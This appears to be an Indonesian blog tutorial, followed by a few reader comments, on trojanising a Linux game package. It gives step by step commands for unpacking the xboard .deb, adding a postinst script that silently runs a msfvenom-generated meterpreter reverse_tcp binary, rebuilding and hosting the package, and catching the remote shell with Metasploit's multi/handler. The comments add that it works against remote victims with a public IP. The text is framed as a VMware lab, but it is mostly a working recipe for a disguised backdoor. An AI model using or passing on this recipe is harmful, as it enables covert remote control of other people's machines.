A. Pengertian
Mungkin dari beberapa pembaca disini sudah mengetahui apa itu metasploit,
B. Latar Belakang
Banyak orang bilang bahwa linux itu aman dari virus, saya sendiri awalnya juga menganggap seperti itu,disini saya akan sedikit berbagi mengenai How to hack linux using Metasploit !.
C. Tahap Pelaksanaan
- Sebelum mengikuti tutorial sebaiknya anda memakai os Linux (Direkomendasikan Memakai Os Pentest seperti Backbox,Kali Linux,dll)
- Disini saya memanfaatkan VMware sebagai tumbalnya
- Tentunya ada koneksi internet yang nanti untuk mendownload sebuah Package
- Buka terminal anda dan masukin perintah seperti dibawah ini
root@linuxsec:~# apt-get –download-only install xboard
- Setelah itu buatlah sebuah folder di tmp dengan memasukan perintah seperti dibawah ini
root@linuxsec:~# mkdir /tmp/linuxsec
- Lalu pindahkan package xboard ke folder yang baru saja tadi dibuat, seperti dibawah ini
root@linuxsec:~# mv /var/cache/apt/archives/xboard_4.7.3-1_amd64.deb /tmp/linuxsec
- Setelah itu masuk ke folder yang baru saja di buat,masukan perintah seperti ini
root@linuxsec:/tmp/linuxsec# dpkg -x xboard_4.7.3-1_amd64.deb gamerat
root@linuxsec:/tmp/linuxsec# mkdir gamerat/DEBIAN - Masuk ke folder DEBIAN lalu buat file “control” dan isilah file tersebut seperti dibawah ini
Package: Xboard
Version: 1.0.0
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: Mohon Bersabar Ini Ujiannote : Description bisa anda ubah
- Kalau sudah buatlah file lagi yaitu “postinst”, dan isi filenya seperti dibawah ini
#!bin/sh
sudo chmod 2755 /usr/games/xboard_nilai && /usr/games/xboard_nilai & /usr/games/xboard & - Setelah itu kita buat payloadnya,masukan perintah seperti dibawah ini
root@linuxsec:~# msfvenom -a x86 –platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.117.1 LPORT=1337 -b “x00” -f elf -o /tmp/linuxsec/gamerat/usr/games/xboard_nilai
note : ubah path yang saya kasih warna merah dengan path anda, dan ubah ip sama port yang saya kasih warna hijau sesuai konfigurasi awal anda
- Setelah itu kasih hak akses dan build package tersebut, dengan memasukan perintah seperti dibawah ini
root@linuxsec:~# cd /tmp/linuxsec/gamerat/DEBIAN
root@linuxsec:/tmp/linuxsec/gamerat/DEBIAN# chmod 755 postinst
root@linuxsec:/tmp/linuxsec/gamerat/DEBIAN# cd /tmp/linuxsec/
root@linuxsec:/tmp/linuxsec/# dpkg-deb –build gamerat - Setelah itu copy trojannya taruh di /var/www atau /var/www/html
- Trojan kita sudah jadi sekarang anda eksekusi filenya di VMware Dan Meremotenya,,caranya gimana ?
- Installah terlebih dahulu gufw < pengertian dan cara penggunaan anda bisa cari di google
- Lalu buka Terminal anda ketikan perintah seperti dibawah ini
msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.117.1
lhost => 172.16.117.1
msf exploit(handler) > set lport 1337
lport => 1337
msf exploit(handler) > exploit - Setelah itu di OS Guest(Os linux yang dijadikan tumbal ,sudah terinstall di vmware)
- Masuk ke OS Guest Guset tersbut dan download file anda, dengan memasukan perintah seperti berikut
wget http://172.16.117.1/gamerat.deb
- Masih di Os Guest > eksekusi filenya dengan memamuskan perintah
root@guestos:/home/guestos# chmod +x gamerat.deb
root@gusetos:/home/guestos# dpkg -i gamerat.deb - Lihat apa yang terjadi di metasploit console anda di Os Host
Kalu muncul seperti gambar dibawah ini berarti anda sukses mengikuti tutorial seperti diatas
Kalau anda masih belum paham dengan tutorial diatas anda bisa melihat video di bawah ini
klo beda jaringan gimanaa?
sama aja. cuma ip harus publik
ini seperti kita naruh backdoor kemudian korban di suruh ngeksekusi backdoor tersebut ya?